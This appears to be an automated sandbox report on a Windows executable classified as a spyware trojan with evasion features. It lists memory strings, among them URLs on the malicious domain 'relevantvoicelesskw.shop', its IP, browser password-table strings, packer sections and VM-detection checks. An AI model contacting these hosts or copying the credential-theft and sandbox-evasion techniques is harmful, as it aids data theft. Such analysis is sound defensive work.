Source: Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1744190634.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1877392777.0000000003084000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1705274256.0000000000A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/api
Source: Ag3ijL3z1w.exe, 00000000.00000003.1744935540.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1746473876.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1730645380.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1739179315.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1742531080.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1728879216.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741194692.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741869098.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1729089345.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1743172054.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1744190634.0000000003089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/api0
Source: Ag3ijL3z1w.exe, 00000000.00000003.1771850830.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765053909.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1764592696.0000000003089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/api6
Source: Ag3ijL3z1w.exe, 00000000.00000002.1877392777.0000000003070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/apiA
Source: Ag3ijL3z1w.exe, 00000000.00000003.1764742560.000000000308C000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765258902.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1764592696.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765053909.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741282403.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1746883165.000000000308E000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1739179315.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741194692.000000000308D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/api~
Source: Ag3ijL3z1w.exe, 00000000.00000003.1705274256.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/b
Source: Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/l
Source: Ag3ijL3z1w.exe, 00000000.00000003.1872803431.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1876372507.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/s
Source: Ag3ijL3z1w.exe, 00000000.00000002.1876372507.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/~
Source: Ag3ijL3z1w.exe, 00000000.00000003.1720366524.000000000308C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop:443/apiBE2NhtLOoTLNNgOkw
Source: Ag3ijL3z1w.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713734255.00000000030A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsoft.
Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712600543.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Ag3ijL3z1w.exe, 00000000.00000003.1712662411.00000000030A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1705205037.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1705205037.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Ag3ijL3z1w.exe, 00000000.00000003.1730708871.0000000003192000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: Ag3ijL3z1w.exe	Static PE information: section name: .vmp$PH
Source: Ag3ijL3z1w.exe	Static PE information: section name: .vmp$PH
Source: Ag3ijL3z1w.exe	Static PE information: section name: .vmp$PH

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000820C1 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00074280 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000924B2 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000746B7 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000927AF NtOpenSection,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000967D0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000927F1 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0009286A NtClose,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00092987 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00078E50 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00090F80 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007541A NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00095440 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00095640 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000756F7 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00095810 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007D860 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00095940 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00095BD0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00095D40 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00096060 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00072277 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00096400 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00076492 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007C5F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00072700 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007C765 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007A762 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00076790 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007A880 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00092C52 NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00074D10 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007EDB2 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00080F04 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007CF46 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0008F1E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00091220 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00077305 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000914A0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00091600 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007960A NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00091710 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00091840 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00091950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00095AB0 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00079C41 NtAllocateVirtualMemory,NtFreeVirtualMemory,
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00077C59 NtAllocateVirtualMemory,NtFreeVirtualMemory,

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00064640
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00083216
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000812E2
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007D860
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00096060
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00082382
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00096400
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000664F0
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0011A824
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000668B4
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00086D8E
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00062E70
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00080F04
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007CF46
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00072F77
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0008EF80
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007F3FD
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00065477
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0007960A
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00061700
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00065717
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00083216
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00073A27
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00065A3C
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00077A8C
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00067B20
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00079C41
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00063C6F
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_002DDCD6
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_0006FDB0
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00065F30

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: String function: 00068560 appears 44 times
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: String function: 0006FF60 appears 154 times

Source: Ag3ijL3z1w.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: webio.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Section loaded: ondemandconnroutehelper.dll

Source: Ag3ijL3z1w.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/1

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.000000000307E000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712772527.00000000030A4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

File read: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Jump to behavior

Source: Ag3ijL3z1w.exe

Static file information: File size 2444904 > 1048576

Source: Ag3ijL3z1w.exe

Static PE information: Raw size of .vmp$PH is bigger than: 0x100000 < 0x24ae00

Source: Ag3ijL3z1w.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp$PH

Source: Ag3ijL3z1w.exe	Static PE information: section name: .vmp$PH
Source: Ag3ijL3z1w.exe	Static PE information: section name: .vmp$PH
Source: Ag3ijL3z1w.exe	Static PE information: section name: .vmp$PH

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_3_00B29BB3 push ds; retf
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000A8597 pushfd ; ret
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_000A6A32 push cs; retf
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_003533E7 push esi; ret
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 0_2_00105F3D push esp; ret

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

System information queried: FirmwareTableInformation

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Code function: 0_2_0013E70F rdtsc

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe TID: 7280

Thread sleep time: -210000s >= -30000s

Source: Ag3ijL3z1w.exe, 00000000.00000003.1705221839.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1712321938.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1875704776.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1873169366.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
